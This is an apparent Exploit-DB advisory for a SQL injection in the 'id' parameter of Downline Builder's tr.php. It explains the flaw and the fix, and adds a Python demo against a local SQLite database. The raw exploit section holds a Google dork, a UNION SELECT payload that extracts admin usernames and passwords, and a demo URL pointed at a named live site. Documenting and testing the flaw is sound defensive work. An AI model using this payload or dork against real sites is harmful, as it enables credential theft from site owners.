Vendor: Downline Builder
By: Hussin X
CVSS: 9 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Downline Builder
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2008-11-01

Downline Builder( id ) Remote SQL Injection Vulnerability

The vulnerability is caused by insufficient sanitization of user-supplied input passed via the 'id' parameter to the 'tr.php' script: the value is placed directly into a SQL query instead of being cast to an integer or bound as a query parameter. A remote, unauthenticated attacker can therefore append a UNION SELECT to the query (the published payload pads the SELECT to 13 columns, so the original query must return 13 columns) and read arbitrary data from the database, including the administrator username and password stored in the 'adminsettings' table.

Mitigation:

Cast the 'id' parameter to an integer and pass it to the database through a prepared statement with bound parameters rather than by string concatenation; input validation on its own is a weaker, secondary control. No vendor patch is listed for this issue.
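As an added illustration, not part of the original advisory or of the Downline Builder code, the following Python script reproduces the injection and the fix against an in-memory SQLite database. The schema is constructed: the page does not show tr.php's query, only that a UNION padded to 13 columns lines up with it and that 'adminsettings' has Username and Password columns. The MySQL concat(0x3a, ...) used in the published payload is rewritten with SQLite's || operator so the demo runs offline, and the column-count probe shows how the 13-column padding is found in the first place.

```python
import sqlite3
from urllib.parse import unquote_plus

# Constructed sample schema standing in for the application's database.
# ASSUMPTION: tr.php's real query is not on the page; we only know the UNION
# needs 13 columns and that adminsettings holds Username and Password.
SCHEMA = """
CREATE TABLE tracker (
    id INTEGER PRIMARY KEY, c2 TEXT, c3 TEXT, c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT,
    c8 TEXT, c9 TEXT, c10 TEXT, c11 TEXT, c12 TEXT, c13 TEXT
);
CREATE TABLE adminsettings (Username TEXT, Password TEXT);
INSERT INTO tracker VALUES (1,'a','b','c','d','e','f','g','h','i','j','k','l');
INSERT INTO adminsettings VALUES ('admin', 's3cret');
"""

# The advisory's payload (URL-encoded, '+' means space), with the MySQL
# concat(0x3a,...) replaced by SQLite's || concatenation operator.
PAYLOAD = ("-1+union+select+1,2,3,':'||Username||':'||Password,"
           "5,6,7,8,9,10,11,12,13+from+adminsettings--")


def make_db():
    """Fresh in-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def tr_vulnerable(conn, raw_id):
    """Assumed tr.php behaviour: the id parameter is concatenated into the SQL."""
    sql = "SELECT * FROM tracker WHERE id=" + raw_id
    return conn.execute(sql).fetchall()


def tr_hardened(conn, raw_id):
    """Fix: cast to int, then bind as a parameter. Non-numeric input is rejected."""
    try:
        tracker_id = int(raw_id)
    except ValueError:
        return None  # the application would return an error page here
    return conn.execute("SELECT * FROM tracker WHERE id=?", (tracker_id,)).fetchall()


def find_column_count(conn, max_cols=20):
    """Enumerate the SELECT's column count the way an attacker does before a
    UNION: grow the padding until the database stops complaining."""
    for n in range(1, max_cols + 1):
        probe = "-1 union select " + ",".join(str(i) for i in range(1, n + 1)) + "--"
        try:
            tr_vulnerable(conn, probe)
            return n
        except sqlite3.OperationalError:
            continue  # column-count mismatch between the two SELECTs
    return None


def demo():
    """Run the payload through both versions and a legitimate id through the fix."""
    conn = make_db()
    injected = unquote_plus(PAYLOAD)
    leaked = tr_vulnerable(conn, injected)   # admin credentials appear in column 4
    blocked = tr_hardened(conn, injected)    # None: int() rejects the payload
    legit = tr_hardened(conn, "1")           # the normal record still works
    return leaked, blocked, legit


if __name__ == "__main__":
    conn = make_db()
    print("columns in tr.php query:", find_column_count(conn))
    leaked, blocked, legit = demo()
    print("vulnerable:", leaked)
    print("hardened with payload:", blocked)
    print("hardened with id=1:", legit)
```

The leaked row shows why the payload puts its concat() in position 4 and numbers elsewhere: every UNION column must exist, and whichever column the page actually renders is the one that carries the credentials. The hardened version never reaches the database with attacker-controlled SQL, which is the property to test for after patching.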

Exploit-DB raw data:

Downline Builder( id ) Remote SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

___________________________________

script    : http://www.yourfreeworld.com/script/downlinebuilder.php

DorK   : inurl:tr.php?id= Downline

Exploit :
_______

tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--


Demo :
_______

http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--





Greetz : All my friends

# milw0rm.com [2008-11-01]